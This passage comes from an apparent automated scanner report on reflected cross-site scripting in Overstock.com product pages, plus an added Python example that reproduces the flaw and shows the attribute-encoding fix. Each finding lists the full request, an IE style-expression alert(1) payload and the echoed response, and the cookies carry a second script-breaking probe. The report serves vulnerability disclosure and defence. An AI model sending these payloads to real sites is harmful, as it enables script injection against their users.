Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=512067|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:35 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408195880:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:35 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=31
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111344

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="2260e"style="x:expression(alert(1))"96ee5398979" value="1"/>
...[SNIP]...

2.12. http://www.overstock.com/Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7efa"style="x:expression(alert(1))"dd0f4e2dd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html?b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408179650:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3025022|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:19 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="b7efa"style="x:expression(alert(1))"dd0f4e2dd35" value="1"/>
...[SNIP]...

2.13. http://www.overstock.com/Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18c8b"style="x:expression(alert(1))"366dab40ca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html?18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:18 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408178339:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcproclicks=5045672|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="18c8b"style="x:expression(alert(1))"366dab40ca2" value="1"/>
...[SNIP]...

2.14. http://www.overstock.com/Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840a2"style="x:expression(alert(1))"5ec9222a23b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html?840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:29 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:29 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408189351:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:29 GMT; Path=/
Set-Cookie: mxcproclicks=3011906|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:29 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114165

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="840a2"style="x:expression(alert(1))"5ec9222a23b" value="1"/>
...[SNIP]...

2.15. http://www.overstock.com/Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77fe0"style="x:expression(alert(1))"15d03d4ed59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html?77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=22704|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:00 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404739950:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:00 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="77fe0"style="x:expression(alert(1))"15d03d4ed59" value="1"/>
...[SNIP]...
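Findings 2.7 through 2.15 above are the same defect on different product pages: every query-string parameter is carried forward into a hidden input, and the parameter name is copied into name="..." without attribute encoding, so a double quote in the name closes the attribute and the rest of the payload becomes a new style attribute. The following script is an added example, not part of the XSS.CX report or of the Overstock.com code: it rebuilds the scanner's probe from the prefix and suffix used in finding 2.7, models the decoding and the vulnerable template (the template itself is an assumption; only the payload shape and the echoed markup come from the report), shows the attribute-encoded version that closes the issue, and runs a parser-level check that tells the two apart by whether a style attribute carrying expression() now exists.

```python
"""Added example: reproduce and detect the attribute-context break-out described in
section 2 of the report, beside the attribute encoding that fixes it. The renderer
functions and the query parser are assumptions made for this example."""
import html
import re
from urllib.parse import unquote

# Payload shape shared by every finding: random prefix, a quote that closes the
# name="..." attribute, a new style attribute with an IE CSS expression(), random suffix.
STYLE_PAYLOAD = '"style="x:expression(alert(1))"'


def probe_name(prefix: str, suffix: str) -> str:
    """The decoded parameter NAME the scanner expects to see echoed back."""
    return prefix + STYLE_PAYLOAD + suffix


def probe_query(prefix: str, suffix: str) -> str:
    """Query string as in the report's request line: only '=' and ':' are percent-encoded
    (so the whole payload survives as one parameter name); the quotes are sent raw."""
    name = probe_name(prefix, suffix).replace("=", "%3d").replace(":", "%3a")
    return f"{name}=1"


def decode_query(query: str) -> dict:
    """Minimal server-side query parser (assumed): split on '&' and the first '=',
    then percent-decode both halves. This turns %3d back into '=' before the name
    is copied into the page."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def render_hidden_inputs_vulnerable(params: dict) -> str:
    """Assumed vulnerable template: the parameter name is interpolated into name="..."
    unencoded. Output matches the markup quoted in the report."""
    return "".join(f'<input type="hidden" name="{k}" value="{v}"/>' for k, v in params.items())


def render_hidden_inputs_fixed(params: dict) -> str:
    """Same template with attribute encoding on both name and value. html.escape with
    quote=True turns '"' into '&quot;', so the attribute cannot be closed early and no
    new attribute (style, event handlers, ...) can be introduced."""
    return "".join(
        '<input type="hidden" name="{}" value="{}"/>'.format(
            html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in params.items())


_TAG_RE = re.compile(r"<([a-zA-Z][^>]*)>")
_ATTR_RE = re.compile(r'([^\s=/"]+)="([^"]*)"')


def tag_attributes(body: str):
    """Yield (tag_name, {attr: value}) per start tag, treating double quotes as the
    attribute delimiters exactly as the report's context description says. Kept
    deliberately simple; it exists to show how the injected quote moves the boundaries."""
    for match in _TAG_RE.finditer(body):
        inner = match.group(1)
        yield inner.split(None, 1)[0], dict(_ATTR_RE.findall(inner))


def injected_style_attributes(body: str) -> list:
    """Style attribute values containing an IE expression(): the concrete sign that the
    canary broke out of the original attribute rather than staying inside its value."""
    found = []
    for _tag, attrs in tag_attributes(body):
        style = attrs.get("style", "")
        if "expression(" in style:
            found.append(style)
    return found


def is_reflected_in_attribute(body: str, prefix: str, suffix: str) -> bool:
    """Scanner-style verdict: probe echoed verbatim (quotes intact) AND the parser now
    sees a style attribute carrying the expression."""
    return probe_name(prefix, suffix) in body and bool(injected_style_attributes(body))


if __name__ == "__main__":
    # Prefix/suffix copied from finding 2.7 so the echo line matches the report.
    prefix, suffix = "a597d", "e7efc54d74e"
    params = decode_query(probe_query(prefix, suffix))
    vulnerable = render_hidden_inputs_vulnerable(params)
    fixed = render_hidden_inputs_fixed(params)
    print(vulnerable)
    print("vulnerable reflected:", is_reflected_in_attribute(vulnerable, prefix, suffix))
    print(fixed)
    print("fixed reflected:", is_reflected_in_attribute(fixed, prefix, suffix))
```

The check keys on the style attribute because that is the payload this report used; the encoding fix is not payload-specific, since once the quote is emitted as &quot; no attribute boundary can be created by any parameter name, which is why the fix belongs in the template rather than in a filter for expression(). Because the defect is in the shared product-page template, one fix covers every product URL listed in section 2 rather than each finding needing its own change.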

2.16. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3eb0"style="x:expression(alert(1))"cffb449a7f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html?f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:27 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5093405|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408127347:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="f3eb0"style="x:expression(alert(1))"cffb449a7f1" value="1"/>
...[SNIP]...

2.17. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9824"style="x:expression(alert(1))"c26b1ff405c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html?c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:37 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408137050:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5137568|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:37 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:37 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="c9824"style="x:expression(alert(1))"c26b1ff405c" value="1"/>
...[SNIP]...

2.18. http://www.overstock.com/Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html

Issue detail

